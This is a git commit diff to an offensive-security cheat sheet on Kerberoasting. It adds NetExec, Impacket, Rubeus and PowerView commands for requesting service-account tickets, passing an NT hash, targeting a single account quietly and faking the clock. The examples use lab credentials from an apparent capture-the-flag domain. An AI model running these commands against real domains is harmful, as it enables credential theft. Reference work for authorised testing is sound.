commit a7f06732714b260546c818388e1d428340447e6b
parent 6e972204d878787804711cb96ab82e4ea0bf9a8c
Author: DAEMON <zer0sec.xp@icloud.com>
Date: Mon, 14 Sep 2026 04:18:34 +0100
kerberoasting: add per-tool single-account targeting + clock skew
Expand NetExec into a full block (--kerberoast-account, NT-hash auth,
faketime for KRB_AP_ERR_SKEW). Add a "Targeting a Specific Account"
section mapping single-account syntax across NetExec, Impacket
(-request-user), Rubeus (/user), PowerView, and Invoke-Kerberoast.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01M5UxsZJNmMAjbD7NREv2wF
Diffstat:
1 file changed, 57 insertions(+), 1 deletion(-)
diff --git a/src/content/sheets/active-directory/kerberoasting.md b/src/content/sheets/active-directory/kerberoasting.md
@@ -106,7 +106,25 @@ GetUserSPNs.py -no-preauth bobby -usersfile spn_users.txt -dc-host <DC_IP> DOMAI
GetUserSPNs.py DOMAIN/user:password -dc-ip <DC_IP> -target-domain trusted.local -request
```
-> **Note —** NetExec can also roast in one shot: `nxc ldap <DC_IP> -u user -p password --kerberoasting hashes.txt`.
+### NetExec (Linux/Remote)
+```bash
+# Roast every kerberoastable account in one shot
+nxc ldap <DC_IP> -d DOMAIN.LOCAL -u user -p password --kerberoasting hashes.txt
+
+# Authenticate with an NT hash instead of a password
+nxc ldap <DC_IP> -d DOMAIN.LOCAL -u user -H <NThash> --kerberoasting hashes.txt
+
+# Target ONE account only — --kerberoast-account <sAMAccountName>
+nxc ldap dc01.fluffy.htb -d fluffy.htb -u p.agila -p prometheusx-303 \
+ --kerberoasting kerberos.txt --kerberoast-account winrm_svc
+
+# Fix KRB_AP_ERR_SKEW (clock drift vs. the DC) by faking the time with faketime.
+# Offset the local clock forward/back to match the DC before the LDAP/Kerberos call:
+faketime -f '+7h' nxc ldap dc01.fluffy.htb -d fluffy.htb -u p.agila -p prometheusx-303 \
+ --kerberoasting kerberos.txt --kerberoast-account winrm_svc
+```
+
+> **Note —** `--kerberoast-account` filters server-side so you only pull the target's TGS instead of every SPN in the domain — far quieter, and useful when you already know which service account you want (e.g. from BloodHound). Sync clocks first: Kerberos rejects requests more than 5 minutes off (`KRB_AP_ERR_SKEW`). Use `sudo ntpdate <DC_IP>`/`sudo rdate -n <DC_IP>` to sync, or wrap the command in `faketime` as above when you cannot change the host clock.
### Invoke-Kerberoast (PowerShell)
```powershell
@@ -136,6 +154,44 @@ kerberos::list /export
---
+## Targeting a Specific Account
+
+When you already know the service account you want (from BloodHound, an ACL edge, or prior enum), roast just that one SPN. It is quieter than bulk roasting and avoids dumping tickets you cannot crack.
+
+| Tool | Single-account syntax |
+|---|---|
+| **NetExec** | `--kerberoast-account <sAMAccountName>` (server-side filter) |
+| **Impacket** | `GetUserSPNs.py ... -request-user <sAMAccountName>` |
+| **Rubeus** | `.\Rubeus.exe kerberoast /user:<sAMAccountName>` |
+| **PowerView** | `Get-DomainUser <sam> -SPN \| Get-DomainSPNTicket -OutputFormat Hashcat` |
+| **Invoke-Kerberoast** | `Invoke-Kerberoast -Identity <sAMAccountName> -OutputFormat Hashcat` |
+
+```bash
+# Impacket — request only winrm_svc's TGS
+GetUserSPNs.py fluffy.htb/p.agila:prometheusx-303 -dc-ip <DC_IP> \
+ -request-user winrm_svc -outputfile kerberos.txt
+
+# Impacket with an NT hash instead of a password
+GetUserSPNs.py -hashes ':<NThash>' fluffy.htb/p.agila -dc-ip <DC_IP> \
+ -request-user winrm_svc -outputfile kerberos.txt
+
+# NetExec — same target, server-side filter (wrap in faketime if clocks drift)
+nxc ldap dc01.fluffy.htb -d fluffy.htb -u p.agila -p prometheusx-303 \
+ --kerberoasting kerberos.txt --kerberoast-account winrm_svc
+```
+
+```powershell
+# Rubeus — one account, Hashcat format, no line wrap
+.\Rubeus.exe kerberoast /user:winrm_svc /outfile:kerberos.txt /nowrap
+
+# PowerView — resolve the SPN then request only that ticket
+Get-DomainUser winrm_svc -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | fl
+```
+
+> **Note —** All Kerberos requests are time-sensitive. If you hit `KRB_AP_ERR_SKEW` / "Clock skew too great", the local clock is more than 5 minutes off the DC. Sync with `sudo ntpdate <DC_IP>` (or `sudo rdate -n <DC_IP>`), or prefix the command with `faketime -f '+7h' <command>` to shift the clock for that process only.
+
+---
+
## Phase 3 — Offline Hash Cracking
### Hash Format Reference